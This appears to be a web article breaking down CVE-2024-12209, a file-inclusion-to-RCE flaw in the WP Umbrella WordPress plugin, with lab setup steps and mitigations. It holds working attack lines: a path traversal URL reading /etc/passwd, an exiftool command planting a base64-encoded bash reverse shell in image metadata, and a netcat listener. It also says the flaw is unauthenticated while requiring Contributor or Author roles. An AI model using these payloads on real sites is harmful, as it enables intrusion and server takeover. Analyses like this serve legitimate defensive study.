Back to Home

LFI RCE in WP Umbrella CVE-2024-12209

LFI vulnerability CVE-2024-12209 (CVSS 9.8) discovered in WP Umbrella, leading to RCE. Two exploitation vectors analyzed: direct path traversal and PHP injection via EXIF in media files. Protection recommendations include update and WAF.

RCE via LFI in WP Umbrella: full breakdown of CVE-2024-12209
Advertisement 728x90

Critical LFI Vulnerability in WP Umbrella Allows RCE on WordPress Sites

A critical LFI vulnerability with CVSS 9.8 (CVE-2024-12209) has been discovered in the WP Umbrella plugin, used on over 30,000 WordPress sites. It affects the umbrella-restore endpoint via the filename parameter, allowing unauthenticated users to achieve remote code execution (RCE).

The plugin is designed for centralized monitoring and management of multiple WordPress sites, making it popular among agencies and freelancers. The vulnerability is exploited through dynamic file inclusion without path validation.

Setting Up the Test Environment

To reproduce, you'll need a local LAMP/XAMPP stack with PHP and MySQL. Install WordPress:

Google AdInline article slot
cd ~/Downloads
unzip wordpress-6.6.2.zip
sudo mv wordpress /opt/lampp/htdocs/
sudo chown -R daemon:daemon /opt/lampp/htdocs

Then run the installer at http://127.0.0.1/wordpress. Install the vulnerable version of the WP Umbrella plugin.

LFI Mechanism in umbrella-restore

The vulnerability arises due to the lack of sanitization of the filename parameter in PHP's include/require functions. An attacker can specify a path to an arbitrary file on the server.

Vector 1: Direct Reading of System Files (Contributor Role)

For roles without media upload permissions, path traversal is used:

Google AdInline article slot
https://wp-dev.ddev.site/?umbrella-restore=1&filename=../../../../../../etc/passwd

This allows dumping the contents of /etc/passwd without additional privileges.

Vector 2: RCE via EXIF Metadata Injection (Author Role)

  • Create a JPG file with a PHP payload in the EXIF comment:
exiftool -Comment="<?php system('echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xMjcuMC4wLjEvNDQ0NCAwPiYx | base64 -d | bash')?>" name.jpg
  • Upload the file via the admin: Media → Add New.
  • Copy the URL of the uploaded file, e.g., /wp-content/uploads/2024/12/maxresdefault.jpg.
  • Start a Netcat listener:
nc -lvnp 4444
  • Exploit the LFI:
http://localhost/?umbrella-restore=1&filename=wp-content/uploads/2024/12/maxresdefault.jpg

The payload executes, establishing a reverse shell on port 4444.

Protection Recommendations

  • Update the WP Umbrella plugin to the patched version.
  • Implement a WAF with rules against path traversal (ModSecurity OWASP CRS).
  • Disable access to umbrella-restore for unauthenticated users.
  • Use open_basedir in php.ini to restrict filesystem access.
  • Regularly scan for LFI using Burp Suite or Nuclei.

Key Points

  • The CVSS 9.8 vulnerability allows unauthenticated RCE on 30,000+ sites.
  • Two vectors: direct LFI and injection via EXIF in uploaded media files.
  • Exploitation requires only frontend access, Contributor role or higher.
  • Patching is mandatory; without it, server takeover and data leakage are possible.
  • Test in an isolated environment, avoid production.

— Editorial Team

Google AdInline article slot
Advertisement 728x90

Read Next